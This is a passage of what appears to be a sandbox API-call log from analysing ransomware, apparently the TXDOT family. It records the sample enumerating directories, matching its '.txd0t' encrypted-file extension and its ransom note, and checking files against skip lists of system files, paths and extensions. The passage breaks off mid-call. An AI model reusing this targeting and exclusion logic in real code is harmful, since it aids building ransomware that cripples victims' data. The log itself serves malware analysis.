GetProcessHeap () returned 0xe30000 [0117.290] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ba) returned 0x68410a0 [0117.290] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Client", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0117.302] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client", psz2="\\*", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\*") returned="C:\\588bce7c90097ed212\\Client\\*" [0117.302] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58eaa853, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58eaa853, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0117.386] StrCmpW (psz1=".", psz2=".") returned 0 [0117.386] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58eaa853, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58eaa853, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0117.393] StrCmpW (psz1="..", psz2=".") returned 1 [0117.393] StrCmpW (psz1="..", psz2="..") returned 0 [0117.393] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58e37f09, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58e37f09, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58e5e194, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0117.393] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0117.393] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0117.393] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Client", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0117.394] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client", psz2="\\", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\") returned="C:\\588bce7c90097ed212\\Client\\" [0117.394] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\Client\\!TXDOT_READ_ME!.txt" [0117.394] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0117.394] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0117.394] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0117.394] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0117.394] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0117.394] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0117.394] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0117.394] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0117.394] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0117.394] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0117.394] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0117.394] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0117.394] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0117.394] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0117.394] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0117.394] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0117.394] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x58e37f09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x31644, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="Parameterinfo.xml.txd0t", cAlternateFileName="PARAME~1.TXD")) returned 1 [0117.394] StrCmpW (psz1="Parameterinfo.xml.txd0t", psz2=".") returned 1 [0117.402] StrCmpW (psz1="Parameterinfo.xml.txd0t", psz2="..") returned 1 [0117.402] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Client", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0117.402] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client", psz2="\\", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\") returned="C:\\588bce7c90097ed212\\Client\\" [0117.402] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client\\", psz2="Parameterinfo.xml.txd0t", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.txd0t") returned="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.txd0t" [0117.402] PathFindExtensionW (pszPath="Parameterinfo.xml.txd0t") returned=".txd0t" [0117.402] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.402] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x58e37f09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9a82, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="UiInfo.xml.txd0t", cAlternateFileName="UIINFO~1.TXD")) returned 1 [0117.412] StrCmpW (psz1="UiInfo.xml.txd0t", psz2=".") returned 1 [0117.412] StrCmpW (psz1="UiInfo.xml.txd0t", psz2="..") returned 1 [0117.412] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Client", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0117.412] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client", psz2="\\", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\") returned="C:\\588bce7c90097ed212\\Client\\" [0117.412] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client\\", psz2="UiInfo.xml.txd0t", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.txd0t") returned="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.txd0t" [0117.412] PathFindExtensionW (pszPath="UiInfo.xml.txd0t") returned=".txd0t" [0117.412] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.412] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x58e37f09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9a82, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="UiInfo.xml.txd0t", cAlternateFileName="UIINFO~1.TXD")) returned 0 [0117.422] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0117.423] GetProcessHeap () returned 0xe30000 [0117.430] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0117.431] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x58ed08e4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x40f6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="DHtmlHeader.html.txd0t", cAlternateFileName="DHTMLH~1.TXD")) returned 1 [0117.431] StrCmpW (psz1="DHtmlHeader.html.txd0t", psz2=".") returned 1 [0117.431] StrCmpW (psz1="DHtmlHeader.html.txd0t", psz2="..") returned 1 [0117.431] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.437] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.437] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="DHtmlHeader.html.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\DHtmlHeader.html.txd0t") returned="C:\\588bce7c90097ed212\\DHtmlHeader.html.txd0t" [0117.437] PathFindExtensionW (pszPath="DHtmlHeader.html.txd0t") returned=".txd0t" [0117.438] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.438] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="DisplayIcon.ico", cAlternateFileName="DISPLA~1.ICO")) returned 1 [0117.447] StrCmpW (psz1="DisplayIcon.ico", psz2=".") returned 1 [0117.447] StrCmpW (psz1="DisplayIcon.ico", psz2="..") returned 1 [0117.447] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.448] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.458] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="DisplayIcon.ico", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned="C:\\588bce7c90097ed212\\DisplayIcon.ico" [0117.458] PathFindExtensionW (pszPath="DisplayIcon.ico") returned=".ico" [0117.458] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.458] StrCmpIW (psz1="DisplayIcon.ico", psz2="bootsect.bak") returned 1 [0117.465] StrCmpIW (psz1="DisplayIcon.ico", psz2="iconcache.db") returned -1 [0117.465] StrCmpIW (psz1="DisplayIcon.ico", psz2="thumbs.db") returned -1 [0117.465] StrCmpIW (psz1="DisplayIcon.ico", psz2=" ransomware ") returned 1 [0117.465] StrCmpIW (psz1="DisplayIcon.ico", psz2=" ransom ") returned 1 [0117.465] StrCmpIW (psz1="DisplayIcon.ico", psz2="debug.txt") returned 1 [0117.465] StrCmpIW (psz1="DisplayIcon.ico", psz2="boot.ini") returned 1 [0117.472] StrCmpIW (psz1="DisplayIcon.ico", psz2="desktop.ini") returned 1 [0117.472] StrCmpIW (psz1="DisplayIcon.ico", psz2="autorun.inf") returned 1 [0117.472] StrCmpIW (psz1="DisplayIcon.ico", psz2="ntuser.dat") returned -1 [0117.472] StrCmpIW (psz1="DisplayIcon.ico", psz2="ntldr") returned -1 [0117.479] StrCmpIW (psz1="DisplayIcon.ico", psz2="ntdetect.com") returned -1 [0117.480] StrCmpIW (psz1="DisplayIcon.ico", psz2="bootfont.bin") returned 1 [0117.480] StrCmpIW (psz1="DisplayIcon.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.480] PathFindExtensionW (pszPath="DisplayIcon.ico") returned=".ico" [0117.496] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.496] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58fb57b2, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58fb57b2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Extended", cAlternateFileName="")) returned 1 [0117.496] StrCmpW (psz1="Extended", psz2=".") returned 1 [0117.496] StrCmpW (psz1="Extended", psz2="..") returned 1 [0117.504] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.504] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.504] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Extended", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0117.512] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\system32\\") returned 0x0 [0117.512] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\syswow64\\") returned 0x0 [0117.512] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\system\\") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\winsxs\\") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\appdata\\roaming\\") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\appdata\\local\\") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\appdata\\locallow\\") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\all users\\microsoft\\") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\inetpub\\logs\\") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\boot\\") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\perflogs\\") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\programdata\\") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\drivers\\") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\wsus\\") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\efstmpwp\\") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\$recycle.bin\\") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="crypt_detect") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="cryptolocker") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="ransomware") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="C:\\WINDOWS") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="C:\\Program Files (x86)") returned 0x0 [0117.520] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="C:\\Program Files") returned 0x0 [0117.520] GetProcessHeap () returned 0xe30000 [0117.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4be) returned 0x68410a0 [0117.521] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Extended", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0117.521] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended", psz2="\\*", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\*") returned="C:\\588bce7c90097ed212\\Extended\\*" [0117.521] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58fb57b2, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58fb57b2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1e30 [0117.521] StrCmpW (psz1=".", psz2=".") returned 0 [0117.521] FindNextFileW (in: hFindFile=0xec1e30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58fb57b2, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58fb57b2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0117.521] StrCmpW (psz1="..", psz2=".") returned 1 [0117.521] StrCmpW (psz1="..", psz2="..") returned 0 [0117.521] FindNextFileW (in: hFindFile=0xec1e30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58ef6ad6, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58ef6ad6, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58fb57b2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0117.521] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0117.521] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0117.521] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Extended", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0117.521] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\") returned="C:\\588bce7c90097ed212\\Extended\\" [0117.521] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\Extended\\!TXDOT_READ_ME!.txt" [0117.521] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0117.521] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0117.521] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0117.521] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0117.521] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0117.521] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0117.521] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0117.521] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0117.521] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0117.521] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0117.521] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0117.521] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0117.521] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0117.521] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0117.521] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0117.522] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0117.522] FindNextFileW (in: hFindFile=0xec1e30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x58ef6ad6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16e82, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Parameterinfo.xml.txd0t", cAlternateFileName="PARAME~1.TXD")) returned 1 [0117.522] StrCmpW (psz1="Parameterinfo.xml.txd0t", psz2=".") returned 1 [0117.522] StrCmpW (psz1="Parameterinfo.xml.txd0t", psz2="..") returned 1 [0117.522] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Extended", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0117.522] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\") returned="C:\\588bce7c90097ed212\\Extended\\" [0117.522] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended\\", psz2="Parameterinfo.xml.txd0t", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.txd0t") returned="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.txd0t" [0117.522] PathFindExtensionW (pszPath="Parameterinfo.xml.txd0t") returned=".txd0t" [0117.522] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.522] FindNextFileW (in: hFindFile=0xec1e30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x58ef6ad6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9a8a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="UiInfo.xml.txd0t", cAlternateFileName="UIINFO~1.TXD")) returned 1 [0117.522] StrCmpW (psz1="UiInfo.xml.txd0t", psz2=".") returned 1 [0117.522] StrCmpW (psz1="UiInfo.xml.txd0t", psz2="..") returned 1 [0117.522] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Extended", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0117.522] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\") returned="C:\\588bce7c90097ed212\\Extended\\" [0117.522] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended\\", psz2="UiInfo.xml.txd0t", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.txd0t") returned="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.txd0t" [0117.522] PathFindExtensionW (pszPath="UiInfo.xml.txd0t") returned=".txd0t" [0117.522] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.522] FindNextFileW (in: hFindFile=0xec1e30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x58ef6ad6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9a8a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="UiInfo.xml.txd0t", cAlternateFileName="UIINFO~1.TXD")) returned 0 [0117.522] FindClose (in: hFindFile=0xec1e30 | out: hFindFile=0xec1e30) returned 1 [0117.522] GetProcessHeap () returned 0xe30000 [0117.522] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0117.522] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Graphics", cAlternateFileName="")) returned 1 [0117.522] StrCmpW (psz1="Graphics", psz2=".") returned 1 [0117.522] StrCmpW (psz1="Graphics", psz2="..") returned 1 [0117.522] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.522] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.522] StrNCatW (in: 